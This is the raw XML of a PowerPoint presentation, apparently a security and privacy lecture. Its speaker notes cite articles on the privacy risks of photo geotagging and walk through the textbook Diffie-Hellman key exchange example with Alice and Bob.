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33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide64.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide63.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide62.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide61.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide57.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56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide54.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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide46.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide16.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7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide9.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8.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0.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide13.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6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1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0.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1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9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout8.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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId66"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="569" r:id="rId3"/>
    <p:sldId id="572" r:id="rId4"/>
    <p:sldId id="573" r:id="rId5"/>
    <p:sldId id="574" r:id="rId6"/>
    <p:sldId id="575" r:id="rId7"/>
    <p:sldId id="576" r:id="rId8"/>
    <p:sldId id="577" r:id="rId9"/>
    <p:sldId id="578" r:id="rId10"/>
    <p:sldId id="579" r:id="rId11"/>
    <p:sldId id="580" r:id="rId12"/>
    <p:sldId id="581" r:id="rId13"/>
    <p:sldId id="582" r:id="rId14"/>
    <p:sldId id="583" r:id="rId15"/>
    <p:sldId id="584" r:id="rId16"/>
    <p:sldId id="585" r:id="rId17"/>
    <p:sldId id="586" r:id="rId18"/>
    <p:sldId id="587" r:id="rId19"/>
    <p:sldId id="588" r:id="rId20"/>
    <p:sldId id="589" r:id="rId21"/>
    <p:sldId id="590" r:id="rId22"/>
    <p:sldId id="591" r:id="rId23"/>
    <p:sldId id="592" r:id="rId24"/>
    <p:sldId id="593" r:id="rId25"/>
    <p:sldId id="594" r:id="rId26"/>
    <p:sldId id="595" r:id="rId27"/>
    <p:sldId id="596" r:id="rId28"/>
    <p:sldId id="597" r:id="rId29"/>
    <p:sldId id="598" r:id="rId30"/>
    <p:sldId id="599" r:id="rId31"/>
    <p:sldId id="600" r:id="rId32"/>
    <p:sldId id="601" r:id="rId33"/>
    <p:sldId id="602" r:id="rId34"/>
    <p:sldId id="603" r:id="rId35"/>
    <p:sldId id="604" r:id="rId36"/>
    <p:sldId id="605" r:id="rId37"/>
    <p:sldId id="606" r:id="rId38"/>
    <p:sldId id="607" r:id="rId39"/>
    <p:sldId id="608" r:id="rId40"/>
    <p:sldId id="609" r:id="rId41"/>
    <p:sldId id="610" r:id="rId42"/>
    <p:sldId id="611" r:id="rId43"/>
    <p:sldId id="612" r:id="rId44"/>
    <p:sldId id="613" r:id="rId45"/>
    <p:sldId id="614" r:id="rId46"/>
    <p:sldId id="615" r:id="rId47"/>
    <p:sldId id="616" r:id="rId48"/>
    <p:sldId id="617" r:id="rId49"/>
    <p:sldId id="618" r:id="rId50"/>
    <p:sldId id="619" r:id="rId51"/>
    <p:sldId id="620" r:id="rId52"/>
    <p:sldId id="621" r:id="rId53"/>
    <p:sldId id="622" r:id="rId54"/>
    <p:sldId id="623" r:id="rId55"/>
    <p:sldId id="624" r:id="rId56"/>
    <p:sldId id="625" r:id="rId57"/>
    <p:sldId id="626" r:id="rId58"/>
    <p:sldId id="627" r:id="rId59"/>
    <p:sldId id="628" r:id="rId60"/>
    <p:sldId id="629" r:id="rId61"/>
    <p:sldId id="630" r:id="rId62"/>
    <p:sldId id="631" r:id="rId63"/>
    <p:sldId id="632" r:id="rId64"/>
    <p:sldId id="570" r:id="rId6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9" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="1674"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customXml" Target="../customXml/item2.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B2882A-A021-43C9-B17D-BB5EEFCE9EF9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/1/2019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7CC651-BBCC-4EE9-8A6C-F03BA3B2EB6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4276676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digitaltrends.com/photography/could-you-fall-victim-to-crime-simply-by-geotagging-location-info-to-your-photos/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide18.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.finjanmobile.com/mobile-geo-tagging/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.icanstalku.com/how.php"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digitaltrends.com/photography/could-you-fall-victim-to-crime-simply-by-geotagging-location-info-to-your-photos/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.finjanmobile.com/mobile-geo-tagging/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.icanstalku.com/how.php" TargetMode="Externa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digitaltrends.com/photography/could-you-fall-victim-to-crime-simply-by-geotagging-location-info-to-your-photos/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide21.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.finjanmobile.com/mobile-geo-tagging/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.icanstalku.com/how.php"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en.wikipedia.org/wiki/Alice_and_Bob" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide57.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange#cite_note-9"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2E80AE-A2D3-45AA-9282-165AD6710FE8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21482690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x-none" sz="1200" i="1" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.digitaltrends.com/photography/could-you-fall-victim-to-crime-simply-by-geotagging-location-info-to-your-photos/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.icanstalku.com/how.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" u="sng" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.finjanmobile.com/mobile-geo-tagging/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="120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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{ABC2C3F8-920C-4239-9891-79F2271E8033}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9153383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x-none" sz="1200" i="1" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.digitaltrends.com/photography/could-you-fall-victim-to-crime-simply-by-geotagging-location-info-to-your-photos/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.icanstalku.com/how.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" u="sng" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.finjanmobile.com/mobile-geo-tagging/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="120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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{ABC2C3F8-920C-4239-9891-79F2271E8033}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14542741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x-none" sz="1200" i="1" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.digitaltrends.com/photography/could-you-fall-victim-to-crime-simply-by-geotagging-location-info-to-your-photos/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.icanstalku.com/how.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" u="sng" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.finjanmobile.com/mobile-geo-tagging/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="1200" i="1" kern="120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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{ABC2C3F8-920C-4239-9891-79F2271E8033}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23984956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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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33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F77F84-EBF5-4DC2-873D-49BD8B121CCF}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11743556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2E80AE-A2D3-45AA-9282-165AD6710FE8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33827978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2E80AE-A2D3-45AA-9282-165AD6710FE8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31367580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dirty="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2CDF4A7-CB72-4BF0-8272-D62B5654ADE0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5990249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hlinkClick r:id="rId3" tooltip="Alice and Bob"/>
              </a:rPr>
              <a:t>Alice and Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> agree to use a modulus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 23 and base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 5 (which is a primitive root modulo 23).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Alice chooses a secret integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 4, then sends Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
